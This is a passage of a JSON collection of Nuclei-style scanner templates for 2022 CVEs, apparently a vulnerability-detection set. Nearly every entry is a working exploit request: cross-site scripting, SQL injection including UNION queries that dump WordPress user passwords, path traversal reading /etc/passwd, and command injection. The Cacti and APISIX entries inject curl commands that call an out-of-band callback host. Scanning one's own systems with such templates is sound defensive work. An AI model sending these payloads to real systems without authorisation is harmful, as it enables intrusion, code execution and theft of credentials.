Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","\"Not authenticated\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-34093","info":{"name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/access_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"%3Cscript%3Ealert(document.domain)%3C/script%3E\", \"Invalid consumer key\")"],"condition":"and"}]}]},{"id":"CVE-2022-29009","info":{"name":"Cyber Cafe Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ccms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=%27+Or+1--+-&password=1&login=\n","GET /ccms/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CCMS Admin Dashboard","CCMS ADMIN | Admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1883","info":{"name":"Terraboard <2.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nGET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(7))+ISNULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["\"page\":","\"results\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23178","info":{"name":"Crestron Device - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/aj.html?a=devi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uname\":","\"upassword\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46934","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls"],"matchers-condition":"and","matchers":[{"type":"word","words":["document.getElementById(\"http://\");alert(document.domain);//\").click();","viewer.min.css"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4140","info":{"name":"WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd","{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2290","info":{"name":"Trilium <0.52.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["No handler matched for custom <img src=x onerror=alert(document.domain)>","Note '<img src=x onerror=alert(document.domain)>' not found"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-32429","info":{"name":"MSNSwitch Firmware MNT.2408 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SSID1"]},{"type":"regex","part":"header","regex":["filename=\"Settings(.*).dat","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4049","info":{"name":"WP User <= 7.0 - Unauthenticated SQLi","severity":"critical"},"requests":[{"raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpuser_group_action&group_action=x&wpuser_update_setting={{nonce}}&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))khkM)\n"],"attack":"clusterbomb","payloads":{"path":["/index.php/user/","/user"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header_2, \"text/html\")","contains(body_2, 'Invalid Access')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"wpuser_update_setting\":\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-36446","info":{"name":"Webmin <1.997 - Authenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}\n","POST /package-updates/update.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/package-updates/update.cgi?xnavigation=1\n\nmode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}","uid","gid","groups"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0349","info":{"name":"WordPress NotificationX <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/notificationx/v1/analytics HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnx_id=sleep(6) -- x\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"data\\\":{\\\"success\\\":true}\")"],"condition":"and"}]}]},{"id":"CVE-2022-40879","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>=PQ</p>","\u8be5\u6587\u4ef6\u4e0d"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1168","info":{"name":"WordPress WP JobSearch <1.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(domain)>","wp-jobsearch"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-38553","info":{"name":"Academy Learning Management System <5.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","Study any topic"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0814","info":{"name":"Ubigeo de Peru < 3.6.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users#\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["idProv","idDist","distrito"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0826","info":{"name":"WordPress WP Video Gallery <=1.7.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wp_video_gallery_ajax_add_single_youtube&url=http://oast.me/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Registred videos :\")"],"condition":"and"}]}]},{"id":"CVE-2022-25486","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertConfigField.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurlConfig=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43015","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)\"></a>%20<script>alert(document.domain)</script>&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","MySQL Query Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24112","info":{"name":"Apache APISIX - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apisix/batch-requests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n\n{\n  \"headers\":{\n    \"X-Real-IP\":\"127.0.0.1\",\n    \"Content-Type\":\"application/json\"\n  },\n  \"timeout\":1500,\n  \"pipeline\":[\n    {\n      \"method\":\"PUT\",\n      \"path\":\"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\",\n      \"body\":\"{\\r\\n \\\"name\\\": \\\"test\\\", \\\"method\\\": [\\\"GET\\\"],\\r\\n \\\"uri\\\": \\\"/api/{{randstr}}\\\",\\r\\n \\\"upstream\\\":{\\\"type\\\":\\\"roundrobin\\\",\\\"nodes\\\":{\\\"httpbin.org:80\\\":1}}\\r\\n,\\r\\n\\\"filter_func\\\": \\\"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\\\"}\"\n    }\n  ]\n}\n","GET /api/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"reason\":\"OK\"","\"status\":200"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-24627","info":{"name":"AudioCodes Device Manager Express - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"audiocodes</title>\")"],"internal":true}]},{"raw":["POST /admin/AudioCodes_files/process_login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=&domain=&p=%5C%27or+1%3D1%23\n"],"matchers":[{"type":"word","part":"body","words":["SQL syntax","mysql_fetch","You have an error in your SQL syntax"],"condition":"or"}]}]},{"id":"CVE-2022-1946","info":{"name":"WordPress Gallery <2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wpdevar_gall_img_url_h[<script>alert(document.domain)</script>]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40734","info":{"name":"Laravel Filemanager v2.5.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd","{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"],"stop-at-first-match":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-25487","info":{"name":"Atom CMS v2.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /admin/uploads.php?id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"\n\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: image/jpeg\n\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------30623082103363803402542706041--\n","GET /uploads/{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["SET avatar = '(.*?)'"],"internal":true}]}]},{"id":"CVE-2022-4301","info":{"name":"WordPress Sunshine Photo Cart <2.9.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Registration Form"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32024","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0692","info":{"name":"Rudloff alltube prior to 3.0.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-34049","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"medium"},"requests":[{"raw":["GET /cgi-bin/ExportLogs.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login","Password"],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42746","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-44944","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-46169","info":{"name":"Cacti <=1.2.22 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: 127.0.0.1\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"value\":","\"local_data_id\":"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31656","info":{"name":"VMware - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","<servlet-name>"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34047","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /set_safety.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-1910","info":{"name":"WordPress Shortcodes and Extra Features for Phlox <2.9.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["widget-title\"><script>alert(document.domain)</script></h3>","aux-widget"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39986","info":{"name":"RaspAP 2.8.7 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncfg_id=;id;#\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0597","info":{"name":"Microweber < 1.2.11 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/logout?redirect_to=http://oast.pro/"],"matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"}]}]},{"id":"CVE-2022-0846","info":{"name":"SpeakOut Email Petitions < 2.14.15.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=dk_speakout_sendmail&id=12+AND+(SELECT+5023+FROM+(SELECT(SLEEP(6)))Fvrh)--+VoFu\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Your signature has been added\") || contains(body, \"This petition has already been signed using your email address\")"],"condition":"and"}]}]},{"id":"CVE-2022-34045","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47501","info":{"name":"Apache OFBiz < 18.12.07 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://{{path}}"],"payloads":{"path":["/etc/passwd","c:/windows/win.ini"]},"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-0220","info":{"name":"WordPress GDPR & CCPA <1.9.27 -  Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_2, 'text/html')","status_code_2 == 200","contains(body_2, '<body onload=alert(document.domain)>') && contains(body_2, '/wp-content/plugins/')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0432","info":{"name":"Mastodon Prototype Pollution Vulnerability","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/embed.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["if (data.type !== 'setHeight' || !iframes[data.id]) {"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38467","info":{"name":"CRM Perks Forms < 1.1.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=<img%20src%20onerror=alert(document.domain)>&LastName=<img%20src%20onerror=alert(document.domain)>&%20Company=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(content_type_2, \"text/html\")","contains(body_1, \"CRM Perks Forms\") && contains(body_2, \"<img src onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-24260","info":{"name":"VoipMonitor - Pre-Auth SQL Injection","severity":"critical"},"requests":[{"raw":["POST /api.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmodule=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"success\":true","_vm_version","_debug"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2022-4321","info":{"name":"PDF Generator for WordPress < 1.1.2 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","pdf-generator-for-wp","Total execution time is"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26833","info":{"name":"Open Automation Software OAS Platform V16.00.0121 - Missing Authentication","severity":"critical"},"requests":[{"raw":["POST /OASREST/v2/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: keep-alive\nContent-Type: application/json\n\n{\"username\": \"\", \"password\": \"\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"status\":","\"data\":","\"token\":","\"clientid\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43164","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0540","info":{"name":"Atlassian Jira Seraph - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;","{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["General Insight Configuration"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1390","info":{"name":"WordPress Admin Word Count Column 2.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\\0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0148","info":{"name":"WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`) x\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31269","info":{"name":"Linear eMerge E3-Series - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["ID=","Password="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password='(.+?)'"]}]}]},{"id":"CVE-2022-1937","info":{"name":"WordPress Awin Data Feed <=1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET 